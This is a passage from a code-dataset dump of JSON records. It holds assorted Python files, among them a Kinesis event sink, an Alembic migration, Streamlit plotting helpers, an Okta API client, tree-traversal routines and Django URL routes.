"usage_type": "name"}, {"api_name": "flask.request.form.get", "line_number": 168, "usage_type": "call"}, {"api_name": "flask.request.form", "line_number": 168, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 168, "usage_type": "name"}, {"api_name": "flask.request.form.get", "line_number": 169, "usage_type": "call"}, {"api_name": "flask.request.form", "line_number": 169, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 169, "usage_type": "name"}, {"api_name": "src.user.models.User.hash_password", "line_number": 170, "usage_type": "call"}, {"api_name": "src.user.models.User", "line_number": 170, "usage_type": "name"}, {"api_name": "src.user.models.User.query.filter_by", "line_number": 174, "usage_type": "call"}, {"api_name": "src.user.models.User.query", "line_number": 174, "usage_type": "attribute"}, {"api_name": "src.user.models.User", "line_number": 174, "usage_type": "name"}, {"api_name": "flask.flash", "line_number": 175, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 176, "usage_type": "call"}, {"api_name": "src.user.models.User.query.filter_by", "line_number": 182, "usage_type": "call"}, {"api_name": "src.user.models.User.query", "line_number": 182, "usage_type": "attribute"}, {"api_name": "src.user.models.User", "line_number": 182, "usage_type": "name"}, {"api_name": "flask.flash", "line_number": 183, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 184, "usage_type": "call"}, {"api_name": "src.user.models.User.query.filter_by", "line_number": 189, "usage_type": "call"}, {"api_name": "src.user.models.User.query", "line_number": 189, "usage_type": "attribute"}, {"api_name": "src.user.models.User", "line_number": 189, "usage_type": "name"}, {"api_name": "flask.redirect", "line_number": 190, "usage_type": "call"}, {"api_name": "flask.url_for", "line_number": 190, "usage_type": "call"}, {"api_name": "werkzeug.datastructures.MultiDict", "line_number": 194, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 203, "usage_type": "call"}, {"api_name": "flask.redirect", "line_number": 205, "usage_type": "call"}, {"api_name": "flask.url_for", "line_number": 205, "usage_type": "call"}, {"api_name": "flask.views.MethodView", "line_number": 208, "usage_type": "name"}, {"api_name": "flask.session.get", "line_number": 210, "usage_type": "call"}, {"api_name": "flask.session", "line_number": 210, "usage_type": "name"}, {"api_name": "flask.redirect", "line_number": 212, "usage_type": "call"}, {"api_name": "flask.url_for", "line_number": 212, "usage_type": "call"}, {"api_name": "flask.views.MethodView", "line_number": 215, "usage_type": "name"}, {"api_name": "src.user.models.User.verify_token_for_mail_aproved", "line_number": 222, "usage_type": "call"}, {"api_name": "src.user.models.User", "line_number": 222, "usage_type": "name"}, {"api_name": "flask.redirect", "line_number": 224, "usage_type": "call"}, {"api_name": "flask.url_for", "line_number": 224, "usage_type": "call"}, {"api_name": "flask.redirect", "line_number": 225, "usage_type": "call"}, {"api_name": "flask.url_for", "line_number": 225, "usage_type": "call"}, {"api_name": "flask.views.MethodView", "line_number": 228, "usage_type": "name"}, {"api_name": "src.user.forms.ResendEmailForm", "line_number": 233, "usage_type": "name"}, {"api_name": "flask.request.form", "line_number": 236, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 236, "usage_type": "name"}, {"api_name": "flask.render_template", "line_number": 238, "usage_type": "call"}, {"api_name": "flask.request.form.get", "line_number": 239, "usage_type": "call"}, {"api_name": "flask.request.form", "line_number": 239, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 239, "usage_type": "name"}, {"api_name": "src.user.models.User.query.filter_by", "line_number": 241, "usage_type": "call"}, {"api_name": "src.user.models.User.query", "line_number": 241, "usage_type": "attribute"}, {"api_name": "src.user.models.User", "line_number": 241, "usage_type": "name"}, {"api_name": "src.mailers.send_mail.send_mail_for_aprove", "line_number": 243, "usage_type": "call"}, {"api_name": "flask.flash", "line_number": 244, "usage_type": "call"}, {"api_name": "flask.flash", "line_number": 246, "usage_type": "call"}, {"api_name": "flask.flash", "line_number": 248, "usage_type": "call"}, {"api_name": "flask.redirect", "line_number": 249, "usage_type": "call"}, {"api_name": "flask.url_for", "line_number": 249, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 252, "usage_type": "call"}, {"api_name": "src.views.BaseView", "line_number": 255, "usage_type": "name"}, {"api_name": "flask.session", "line_number": 258, "usage_type": "name"}, {"api_name": "src.user.forms.ChangeAvatarForm", "line_number": 259, "usage_type": "name"}, {"api_name": "werkzeug.datastructures.MultiDict", "line_number": 267, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 272, "usage_type": "call"}, {"api_name": "flask.request.form.get", "line_number": 276, "usage_type": "call"}, {"api_name": "flask.request.form", "line_number": 276, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 276, "usage_type": "name"}, {"api_name": "flask.request.form.get", "line_number": 278, "usage_type": "call"}, {"api_name": "flask.request.form", "line_number": 278, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 278, "usage_type": "name"}, {"api_name": "flask.request.form.get", "line_number": 279, "usage_type": "call"}, {"api_name": "flask.request.form", "line_number": 279, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 279, "usage_type": "name"}, {"api_name": "flask.request.form.get", "line_number": 283, "usage_type": "call"}, {"api_name": "flask.request.form", "line_number": 283, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 283, "usage_type": "name"}, {"api_name": "src.user.models.User.query.filter_by", "line_number": 286, "usage_type": "call"}, {"api_name": "src.user.models.User.query", "line_number": 286, "usage_type": "attribute"}, {"api_name": "src.user.models.User", "line_number": 286, "usage_type": "name"}, {"api_name": "flask.session", "line_number": 286, "usage_type": "name"}, {"api_name": "src.extensions.db.session.commit", "line_number": 290, "usage_type": "call"}, {"api_name": "src.extensions.db.session", "line_number": 290, "usage_type": "attribute"}, {"api_name": "src.extensions.db", "line_number": 290, "usage_type": "name"}, {"api_name": "flask.redirect", "line_number": 292, "usage_type": "call"}, {"api_name": "flask.url_for", "line_number": 292, "usage_type": "call"}, {"api_name": "src.user.decorators.login_required", "line_number": 297, "usage_type": "call"}, {"api_name": "src.user.decorators.login_required", "line_number": 320, "usage_type": "call"}, {"api_name": "src.user.decorators.login_required", "line_number": 328, "usage_type": "call"}]} +{"seq_id": "9039106437", "text": "import boto3\nimport json\nfrom botocore.exceptions import ClientError\nfrom event.processing import get_events_from\nfrom utils.config import AWS_CONF\nfrom utils.logger import init_logger\n\nlog = init_logger(__name__)\n\nclass EventSink(object):\n\n def __init__(self, endpoint_url, stream_name):\n self.client = boto3.client('kinesis', config=AWS_CONF, endpoint_url=endpoint_url, verify=False)\n self.stream_name = stream_name\n\n def put_to_stream(self, payload, event_type):\n \"\"\"\n function used to submit a record to Kinesis stream, with retry in case of failure\n \"\"\"\n while True:\n try:\n log.debug(f\"PutRecord with event_id {payload['event_id']} of type [{event_type}] to Kinesis\")\n self.client.put_record(StreamName=self.stream_name, Data=json.dumps(payload), PartitionKey=event_type)\n break\n except ClientError:\n log.debug(\"`PutRecord` to Kinesis stream failed, retrying...\")\n\n def send(self, submission):\n \"\"\"\n implements submission of separate event types to their respective shards\n \"\"\"\n for event_type in ['new_process', 'network_connection']:\n for event in get_events_from(submission, event_type):\n self.put_to_stream(event, event_type)\n", "repo_name": "florianakos/sqs-to-kinesis-processor", "sub_path": "event_processor/kinesis/sink.py", "file_name": "sink.py", "file_ext": "py", "file_size_in_byte": 1322, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "utils.logger.init_logger", "line_number": 8, "usage_type": "call"}, {"api_name": "boto3.client", "line_number": 13, "usage_type": "call"}, {"api_name": "utils.config.AWS_CONF", "line_number": 13, "usage_type": "name"}, {"api_name": "json.dumps", "line_number": 23, "usage_type": "call"}, {"api_name": "botocore.exceptions.ClientError", "line_number": 25, "usage_type": "name"}, {"api_name": "event.processing", "line_number": 33, "usage_type": "name"}, {"api_name": "event.processing.get_events_from", "line_number": 33, "usage_type": "call"}, {"api_name": "event.processing", "line_number": 34, "usage_type": "argument"}]} +{"seq_id": "74995538113", "text": "\"\"\"Add cache.description\n\nRevision ID: a0ebc6df70c4\nRevises: eb768171dcce\nCreate Date: 2021-10-07 17:30:05.325333\n\n\"\"\"\n\nimport sqlalchemy as sa\nfrom alembic import op\n\n# revision identifiers, used by Alembic\nrevision = \"a0ebc6df70c4\"\ndown_revision = \"eb768171dcce\"\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.add_column(\"caches\", sa.Column(\"description\", sa.Text(), nullable=True))\n op.execute(\"UPDATE caches SET description = 'DEFAULT DESCRIPTION'\")\n with op.batch_alter_table(\"caches\", schema=None) as batch_op:\n batch_op.alter_column(\"description\", nullable=False)\n\n # ### end Alembic commands ###\n\n\ndef downgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.drop_column(\"caches\", \"description\")\n # ### end Alembic commands ###\n", "repo_name": "everycache-group/everycache-app", "sub_path": "api/everycache_api/migrations/versions/a0ebc6df70c4_add_cache_description.py", "file_name": "a0ebc6df70c4_add_cache_description.py", "file_ext": "py", "file_size_in_byte": 866, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "alembic.op.add_column", "line_number": 21, "usage_type": "call"}, {"api_name": "alembic.op", "line_number": 21, "usage_type": "name"}, {"api_name": "sqlalchemy.Column", "line_number": 21, "usage_type": "call"}, {"api_name": "sqlalchemy.Text", "line_number": 21, "usage_type": "call"}, {"api_name": "alembic.op.execute", "line_number": 22, "usage_type": "call"}, {"api_name": "alembic.op", "line_number": 22, "usage_type": "name"}, {"api_name": "alembic.op.batch_alter_table", "line_number": 23, "usage_type": "call"}, {"api_name": "alembic.op", "line_number": 23, "usage_type": "name"}, {"api_name": "alembic.op.drop_column", "line_number": 31, "usage_type": "call"}, {"api_name": "alembic.op", "line_number": 31, "usage_type": "name"}]} +{"seq_id": "15628360896", "text": "import pandas as pd\r\nimport streamlit as st \r\nimport altair as alt \r\nimport plotly.graph_objects as go\r\nimport plotly.figure_factory as ff\r\n# tda magic\r\nfrom gtda.mapper.filter import Projection\r\nfrom gtda.mapper.cover import OneDimensionalCover, CubicalCover\r\nfrom gtda.mapper.pipeline import make_mapper_pipeline\r\nfrom gtda.mapper.visualization import plot_static_mapper_graph, plot_interactive_mapper_graph\r\nfrom sklearn.cluster import DBSCAN\r\nfrom PIL import Image\r\n\r\nst.markdown('', unsafe_allow_html=True)\r\nst.markdown('', unsafe_allow_html=True)\r\n\r\ndef show_image(image, caption=None, width=500):\r\n img = Image.open(image)\r\n st.image(img, caption=caption, use_column_width=False, width=width)\r\n return \r\ndef status_decorator(func):\r\n def wrapper(*args, **kwargs):\r\n status = st.empty()\r\n status.text('Loading function %s' % func.__name__)\r\n out = func(*args, **kwargs)\r\n status.text('Done Loading function %s' % func.__name__)\r\n return out \r\n return wrapper\r\ndef print_decorator(txt):\r\n #st.markdown('''----''')\r\n st.markdown('', unsafe_allow_html=True)\r\n st.markdown('', unsafe_allow_html=True)\r\n st.markdown(f'''> ## {txt}''')\r\n #st.markdown('''----''')\r\n return\r\n\r\n@status_decorator\r\n@st.cache(allow_output_mutation=True)\r\ndef read_dat(data_file, sep=None, nrows=100, **kwargs):\r\n if not sep:\r\n sep='\\t|,|;'\r\n else:\r\n sep=sep+'|'+'\\t|,|;'\r\n return pd.read_csv(data_file, sep=sep, nrows=nrows, engine='python', **kwargs)\r\n\r\ndef get_dtypes(df):\r\n '''return column data types of a dataframe '''\r\n cols = dict({})\r\n data_types = [ 'int64', 'float64', 'bool', 'object' ]\r\n for dtype in data_types:\r\n filter = df.select_dtypes(include=dtype).columns.values\r\n #st.write(filter)\r\n if len(filter)>0:\r\n cols.update({dtype: filter})\r\n \r\n num_cols = []\r\n cat_cols = []\r\n\r\n for key, val in cols.items():\r\n if key == 'float64':\r\n num_cols.extend(val)\r\n elif key == 'int64':\r\n for cat in val:\r\n unique = len(df[cat].unique())/len(df[cat])\r\n if unique > 0.1 or len(df[cat].unique())>100:\r\n num_cols.append(cat)\r\n else:\r\n cat_cols.append(cat)\r\n if key == 'object':\r\n cat_cols.extend(val)\r\n return cols, num_cols, cat_cols\r\n\r\ndef plot_hist(df, select_row, classes, dep_var):\r\n c1=[]\r\n c2=[]\r\n c3=[]\r\n \r\n c1 =alt.Chart(df, height=200, width=200).mark_bar(opacity=0.4, color='#EB6638').encode(\r\n alt.X(select_row, bin=True), y=alt.Y('count()', scale=alt.Scale(type='log'), axis=alt.Axis(title='Den'))).interactive()\r\n \r\n c2 = alt.Chart(df, height=200, width=200).transform_density(\r\n select_row, counts=True, as_=[select_row, 'density']).mark_area(opacity=0.4, color='#38EB89').encode(\r\n alt.X(select_row, axis=alt.Axis()), y=alt.Y('density:Q', axis=alt.Axis(title=None))).interactive()\r\n c3 = alt.Chart(df, height=200, width=200).transform_density(select_row, counts=True, cumulative=True, \r\n as_=[select_row, 'density']).mark_area(opacity=0.4, color='#38E0EB').encode(\r\n alt.X(select_row, axis=alt.Axis()), y=alt.Y('density:Q', axis=alt.Axis(title=None))).interactive()\r\n \r\n return [c1, c2, c3]\r\n\r\n# make a single row\r\n\r\ndef make_hcc(row_of_charts):\r\n hconcat = [chart for chart in row_of_charts]\r\n hcc = alt.HConcatChart(hconcat=hconcat, bounds='flush', spacing=40.)\r\n return hcc\r\n\r\n# take an array of charts and produce a facet grid\r\n\r\ndef facet_wrap(charts, charts_per_row):\r\n rows_of_charts = [\r\n charts[i:i+charts_per_row] \r\n for i in range(0, len(charts), charts_per_row)] \r\n vconcat = [make_hcc(r) for r in rows_of_charts] \r\n vcc = alt.VConcatChart(vconcat=vconcat, padding={'left':20, 'top':5}, spacing=40)\\\r\n .configure_axisX(grid=True)\\\r\n .configure_axisY(grid=True)\r\n return vcc\r\n\r\ndef box_plot(df, cols):\r\n fig = go.Figure()\r\n for col in cols:\r\n fig.add_trace(go.Violin(y=df[col],\r\n name=col,\r\n box_visible=True,\r\n meanline_visible=True))\r\n fig.update_layout(title='Box and Violin Plots')\r\n return fig\r\n \r\n\r\ndef plotly_hist(df, cols, log=False):\r\n fig = ff.create_distplot([df[c] for c in cols], cols , bin_size=.2)\r\n if log:\r\n fig.update_layout(xaxis_type=\"log\", yaxis_type=\"log\", title='Histogram/Density Plot')\r\n else:\r\n fig.update_layout(title='Histogram/Density Plot')\r\n return fig\r\n\r\n@st.cache\r\ndef plot_mapper(df, color):\r\n pipeline = make_mapper_pipeline(\r\n filter_func=Projection(columns=2),\r\n cover=OneDimensionalCover(),\r\n clusterer=DBSCAN(),\r\n )\r\n return plot_static_mapper_graph(pipeline, df.values, layout_dim=2, \r\n color_variable=color, color_by_columns_dropdown=True)\r\n\r\n@st.cache\r\ndef summarize_cat(series):\r\n counts = series.value_counts()\r\n unique = len(counts.keys())\r\n\r\n popular = pd.Series({key: val for key, val in counts.items() if val >2 })\r\n\r\n return unique, popular, counts", "repo_name": "Vikramardham/eda-app", "sub_path": "utils.py", "file_name": "utils.py", "file_ext": "py", "file_size_in_byte": 5320, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 2, "dataset": "github-code", "pt": "61", "api": [{"api_name": "streamlit.markdown", "line_number": 14, "usage_type": "call"}, {"api_name": "streamlit.markdown", "line_number": 15, "usage_type": "call"}, {"api_name": "PIL.Image.open", "line_number": 18, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 18, "usage_type": "name"}, {"api_name": "streamlit.image", "line_number": 19, "usage_type": "call"}, {"api_name": "streamlit.empty", "line_number": 23, "usage_type": "call"}, {"api_name": "streamlit.markdown", "line_number": 31, "usage_type": "call"}, {"api_name": "streamlit.markdown", "line_number": 32, "usage_type": "call"}, {"api_name": "streamlit.markdown", "line_number": 33, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 44, "usage_type": "call"}, {"api_name": "streamlit.cache", "line_number": 38, "usage_type": "call"}, {"api_name": "altair.Chart", "line_number": 78, "usage_type": "call"}, {"api_name": "altair.X", "line_number": 79, "usage_type": "call"}, {"api_name": "altair.Y", "line_number": 79, "usage_type": "call"}, {"api_name": "altair.Scale", "line_number": 79, "usage_type": "call"}, {"api_name": "altair.Axis", "line_number": 79, "usage_type": "call"}, {"api_name": "altair.Chart", "line_number": 81, "usage_type": "call"}, {"api_name": "altair.X", "line_number": 83, "usage_type": "call"}, {"api_name": "altair.Axis", "line_number": 83, "usage_type": "call"}, {"api_name": "altair.Y", "line_number": 83, "usage_type": "call"}, {"api_name": "altair.Chart", "line_number": 84, "usage_type": "call"}, {"api_name": "altair.X", "line_number": 86, "usage_type": "call"}, {"api_name": "altair.Axis", "line_number": 86, "usage_type": "call"}, {"api_name": "altair.Y", "line_number": 86, "usage_type": "call"}, {"api_name": "altair.HConcatChart", "line_number": 94, "usage_type": "call"}, {"api_name": "altair.VConcatChart", "line_number": 104, "usage_type": "call"}, {"api_name": "plotly.graph_objects.Figure", "line_number": 110, "usage_type": "call"}, {"api_name": "plotly.graph_objects", "line_number": 110, "usage_type": "name"}, {"api_name": "plotly.graph_objects.Violin", "line_number": 112, "usage_type": "call"}, {"api_name": "plotly.graph_objects", "line_number": 112, "usage_type": "name"}, {"api_name": "plotly.figure_factory.create_distplot", "line_number": 121, "usage_type": "call"}, {"api_name": "plotly.figure_factory", "line_number": 121, "usage_type": "name"}, {"api_name": "gtda.mapper.pipeline.make_mapper_pipeline", "line_number": 130, "usage_type": "call"}, {"api_name": "gtda.mapper.filter.Projection", "line_number": 131, "usage_type": "call"}, {"api_name": "gtda.mapper.cover.OneDimensionalCover", "line_number": 132, "usage_type": "call"}, {"api_name": "sklearn.cluster.DBSCAN", "line_number": 133, "usage_type": "call"}, {"api_name": "gtda.mapper.visualization.plot_static_mapper_graph", "line_number": 135, "usage_type": "call"}, {"api_name": "streamlit.cache", "line_number": 128, "usage_type": "attribute"}, {"api_name": "pandas.Series", "line_number": 143, "usage_type": "call"}, {"api_name": "streamlit.cache", "line_number": 138, "usage_type": "attribute"}]} +{"seq_id": "38856072431", "text": "\"\"\"A minimal wrapper for the Okta API.\nhttp://developer.okta.com/docs/api/getting_started/design_principles.html\n\nThe offical python client from okta appears to be abandoned ( https://github.com/okta/oktasdk-python/issues )\nso this wrapper only implements the bare minimum we require\n\"\"\"\n\nfrom posixpath import join as urljoin\nimport json\nimport requests\n\n\nclass OktaError(RuntimeError):\n \"\"\"This exception is raised when the Okta API returns a status code >= 400\n\n Attributes:\n response: The full response object from requests that was returned\n error: The body of the response json decoded\n\n Args:\n response: The full response object that is causing this exception to be raised\n\n \"\"\"\n def __init__(self, response):\n self.response = response\n self.error = json.loads(response.text)\n\n try:\n # make our value, the first problem cause if it exist\n message = self.error['errorCauses'][0]['errorSummary']\n except (KeyError, IndexError):\n # if not, then use the generic (usually less helpful) summary\n message = self.error['errorSummary']\n\n super(OktaError, self).__init__(message)\n\n\nclass OktaClient(object):\n \"\"\"A minimal client for the Okta API\n\n Args:\n base_url: The URL to your Okta instance\n token: An API Token to authenticate\n http://developer.okta.com/docs/api/getting_started/getting_a_token.html\n api_version: The version of the API to use.\n Currently only 'v1' is supported\n \"\"\"\n def __init__(self, base_url, token, api_version='v1'):\n self.base_url = base_url\n self.token = token\n self.api_version = api_version\n\n def _request(self, resource, method, body=None):\n \"\"\"Make a request to the Okta API.\n\n Args:\n resource: The API method you wish to call (example: '/users')\n method: The method to use when making the request GET/POST/etc\n body (optional): An json encodeable object which will be included as the body\n of the request\n\n Raises:\n OktaError: An error occured making the request\n\n Returns:\n dict: The parsed json response\n\n \"\"\"\n # build our URL from all the pieces given to us\n endpoint = urljoin(\n self.base_url,\n 'api',\n self.api_version,\n resource.lstrip('/')\n )\n\n # convert 'POST' to requests.post\n requests_method = getattr(requests, method.lower())\n\n # make the request\n response = requests_method(\n endpoint,\n json=body,\n headers={\n 'Authorization': 'SSWS ' + self.token\n }\n )\n\n # if we errored raise an exception\n if response.status_code >= 400:\n raise OktaError(response)\n\n # return the response\n return json.loads(response.text)\n\n def new_user(self, email, first_name, last_name):\n \"\"\"Create a new user with minimal details\n\n Args:\n email: The email address (and login) for this user\n first_name: The first name for the user\n last_name: The last name for the user\n\n Raises:\n OktaError: There was an error creating the user\n\n Returns:\n dict: An object describing the created user\n\n \"\"\"\n okta_user = {\n 'profile': {\n 'email': email,\n 'login': email,\n 'firstName': first_name,\n 'lastName': last_name\n }\n }\n\n return self._request('/users', 'POST', body=okta_user)\n\n def provision_user(self, user):\n \"\"\"Create a user and return the URL to the created resource\n\n Args:\n user(dict): A dict in the format returned by a call to uaapp.clients.uaa.UAAClient.get_user()\n\n Raises:\n OktaError: There was an error creating the user\n\n Returns:\n str: The url to the created resource\n\n \"\"\"\n\n try:\n first_name = user['name']['givenName']\n if not first_name:\n raise KeyError\n except KeyError:\n first_name = user['userName'].split('@', 1)[0]\n\n try:\n last_name = user['name']['familyName']\n if not last_name:\n raise KeyError\n except KeyError:\n last_name = user['userName'].split('@', 1)[1]\n\n try:\n # create the user in okta\n okta_user = self.new_user(user['userName'], first_name, last_name)\n user_id = okta_user['id']\n except OktaError as exc:\n # this is gross, but Okta returns the same error for all validation fails\n # If the user is already in Okta under this email, we'll consider them migrated\n # TODO: Validate this decision\n\n if str(exc) == 'login: An object with this field already exists in the current organization':\n user_id = user['userName']\n else:\n raise\n\n return urljoin(\n self.base_url,\n 'api',\n self.api_version,\n 'users',\n user_id\n )\n", "repo_name": "cnelson/uaapp", "sub_path": "uaapp/clients/okta.py", "file_name": "okta.py", "file_ext": "py", "file_size_in_byte": 5250, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "61", "api": [{"api_name": "json.loads", "line_number": 26, "usage_type": "call"}, {"api_name": "posixpath.join", "line_number": 70, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 94, "usage_type": "call"}, {"api_name": "posixpath.join", "line_number": 164, "usage_type": "call"}]} +{"seq_id": "37858687746", "text": "from time import sleep\nfrom typing_extensions import Self\nimport datetime as dt\nfrom packages.thread import Thread\nimport pyttsx3\n\nglobal speech_engine\nspeech_engine = pyttsx3.init()\n\ndef calc_duration(end_time: dt.time, start_time: dt.time):\n return (end_time.hour - start_time.hour) * 60 * 60 +\\\n (end_time.minute - start_time.minute) * 60 +\\\n (end_time.second - start_time.second)\n\nclass Alarm(Thread):\n def __init__(self, id: int, end_time: dt.time):\n def cb(duration):\n for o in range(duration):\n sleep(1)\n else:\n for _ in range(3):\n speech_engine.say(\"ALARM\")\n speech_engine.runAndWait()\n self.stop()\n super().__init__(cb)\n self.end_time = end_time\n self.id = id\n\n def activate(self: Self) -> None:\n self.args = [self.duration]\n self.start()\n def deactivate(self: Self) -> None:\n self.stop()\n @property\n def duration(self: Self) -> int:\n start_time = dt.datetime.now().time()\n return calc_duration(self.end_time, start_time)\n @property\n def end_time(self: Self) -> dt.time:\n return self._end_time\n @end_time.setter\n def end_time(self: Self, new: dt.time) -> None:\n if new < dt.datetime.now().time():\n raise ValueError()\n self._end_time = new", "repo_name": "HamedMolavi/pyClock", "sub_path": "packages/alarm.py", "file_name": "alarm.py", "file_ext": "py", "file_size_in_byte": 1411, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "pyttsx3.init", "line_number": 8, "usage_type": "call"}, {"api_name": "datetime.time", "line_number": 10, "usage_type": "attribute"}, {"api_name": "packages.thread.Thread", "line_number": 15, "usage_type": "name"}, {"api_name": "datetime.time", "line_number": 16, "usage_type": "attribute"}, {"api_name": "time.sleep", "line_number": 19, "usage_type": "call"}, {"api_name": "typing_extensions.Self", "line_number": 29, "usage_type": "name"}, {"api_name": "typing_extensions.Self", "line_number": 32, "usage_type": "name"}, {"api_name": "typing_extensions.Self", "line_number": 35, "usage_type": "name"}, {"api_name": "datetime.datetime.now", "line_number": 36, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 36, "usage_type": "attribute"}, {"api_name": "typing_extensions.Self", "line_number": 39, "usage_type": "name"}, {"api_name": "datetime.time", "line_number": 39, "usage_type": "attribute"}, {"api_name": "typing_extensions.Self", "line_number": 42, "usage_type": "name"}, {"api_name": "datetime.time", "line_number": 42, "usage_type": "attribute"}, {"api_name": "datetime.datetime.now", "line_number": 43, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 43, "usage_type": "attribute"}]} +{"seq_id": "27618882504", "text": "import numpy as np\nimport pandas as pd\nimport cv2\nfrom sampling import sample\n\n\nfrom torch.utils.data import Dataset, DataLoader, Subset\n\n# For validation\nclass SeriesLoader(Dataset):\n def __init__(self, data_csv, args):\n self.imgs = data_csv[\"Image\"].values\n self.labels = data_csv[\"Label\"].values\n\n chosen_slices = sample(args, len(self.imgs))\n self.imgs = self.imgs[chosen_slices]\n self.labels = self.labels[chosen_slices]\n\n def __len__(self):\n return len(self.imgs)\n\n def __getitem__(self, idx):\n data_dir = \"../Split_data\"\n img_path = f\"{data_dir}/{self.imgs[idx]}\"\n img = cv2.imread(img_path)\n img = img.transpose(2, 0, 1)\n label = self.labels[idx]\n\n # Augmentation\n\n return img\n\n\ndef build_dataloader(data_csv, args, debug=False):\n \"\"\"\n Build dataloader\n\n Returns:\n dataloader: Dataloader object\n \"\"\"\n\n dataset = SeriesLoader(data_csv, args)\n # DEBUG: Only take a subset of dataloader to run script\n if debug:\n dataset = Subset(dataset, np.random.choice(np.arange(len(dataset)), 64))\n\n dataloader = DataLoader(\n dataset, 64, pin_memory=False, shuffle=True, drop_last=False, num_workers=8\n )\n return dataloader\n", "repo_name": "vinbigdata-medical/MIDL2021-CT-Classification", "sub_path": "study_evaluation/series_loader.py", "file_name": "series_loader.py", "file_ext": "py", "file_size_in_byte": 1268, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 6, "dataset": "github-code", "pt": "61", "api": [{"api_name": "torch.utils.data.Dataset", "line_number": 10, "usage_type": "name"}, {"api_name": "sampling.sample", "line_number": 15, "usage_type": "call"}, {"api_name": "cv2.imread", "line_number": 25, "usage_type": "call"}, {"api_name": "torch.utils.data.Subset", "line_number": 45, "usage_type": "call"}, {"api_name": "numpy.random.choice", "line_number": 45, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 45, "usage_type": "attribute"}, {"api_name": "numpy.arange", "line_number": 45, "usage_type": "call"}, {"api_name": "torch.utils.data.DataLoader", "line_number": 47, "usage_type": "call"}]} +{"seq_id": "71406758275", "text": "# btree.py\nfrom functools import reduce\nfrom pprint import pprint\nin_ordered_List = []\n\nclass BinaryTree:\n \n def __init__(self, root_data):\n self.data = root_data\n self.left_child = None\n self.right_child = None\n\n def preorder_iterative(self):\n pre_ordered_List = []\n q = [self]\n while len(q) > 0:\n # print('before',[node.data for node in q])\n nextnode = q.pop()\n pre_ordered_List.append(nextnode.data)\n # if nextnode.left_child:\n # q = [nextnode.left_child] + q\n # if nextnode.right_child:\n # q = [nextnode.right_child] + q\n if nextnode.right_child:\n q.append(nextnode.right_child)\n if nextnode.left_child:\n q.append(nextnode.left_child)\n # print('after',[node.data for node in q])\n return pre_ordered_List\n\n def inorder(self):\n if self.left_child: self.left_child.inorder()\n in_ordered_List.append(self.data)\n if self.right_child: self.right_child.inorder()\n\n def inorder_itr1(self):\n path = []\n q = [self]\n print('init q:',[node.data for node in q])\n while len(q) > 0:\n # print('before',[node.data for node in q],'path',path)\n node = q[-1]\n if node.left_child and node.left_child.data not in path:\n q.append(node.left_child)\n continue\n node = q.pop(-1)\n path.append(node.data)\n if node.right_child:\n q.append(node.right_child)\n # print('after',[node.data for node in q])\n return path\n\n def inorder_itr2(self):\n path = []\n q = []\n node = self\n # print('init q:',[node.data for node in q])\n while True:\n # print('before',[node.data for node in q],'path',path)\n while node:\n q.append(node)\n node = node.left_child\n\n if len(q) < 1:\n break;\n node = q.pop(-1)\n path.append(node.data)\n node = node.right_child\n # print('after',[node.data for node in q])\n return path\n\n def inorder_iter3(self):\n inorder_list = []\n stack = []\n node = self\n while stack or node:\n if node:\n stack.append(node)\n node = node.left_child\n else:\n item = stack.pop()\n inorder_list.append(item.data)\n node = item.right_child\n return inorder_list\n\n def inorder_iter4(self,root,k):\n inorder_list = []\n q = []\n node = root\n while q or node:\n if node:\n q.append(node)\n node = node.left_child\n else:\n node = q.pop()\n inorder_list.append(node)\n node = node.right_child\n return inorder_list[-k-1]\n \n def validate_bst(self):\n # Return type should be Boolean\n path = []\n q = []\n node = self\n # Do inorder traversal. The order of a BST should be sorted this way \n while True: \n # print('before',[node.data for node in q],'path',path)\n while node: # Head straight to the left most node in each subtree\n q.append(node)\n node = node.left_child\n\n if len(q) < 1: # stop if the stack is empty\n break;\n \n node = q.pop(-1)\n if len(path) > 0:\n # check whether current data is greater than previous nodes\n # the reduce should return True if the path is monotonically increasing\n if not reduce((lambda x,y: x and y),list(map((lambda x: x',views.ordersedit, name='ordersedit'),\n path('orders_update/',views.ordersupdate,name='ordersupdate'),\n path('orders_delete/',views.ordersdelete, name='ordersdelete'),\n path('products_tables/',views_product.products, name='products'),\n # path('products_form/',views_product.productsform, name='productsform'),\n path('banners_tables/',views.banners, name='banners'),\n\n]\n", "repo_name": "Deepa-2000/dashboard_panel", "sub_path": "panel/urls.py", "file_name": "urls.py", "file_ext": "py", "file_size_in_byte": 898, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "django.urls.path", "line_number": 6, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 7, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 8, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 9, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 10, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 11, "usage_type": "call"}, 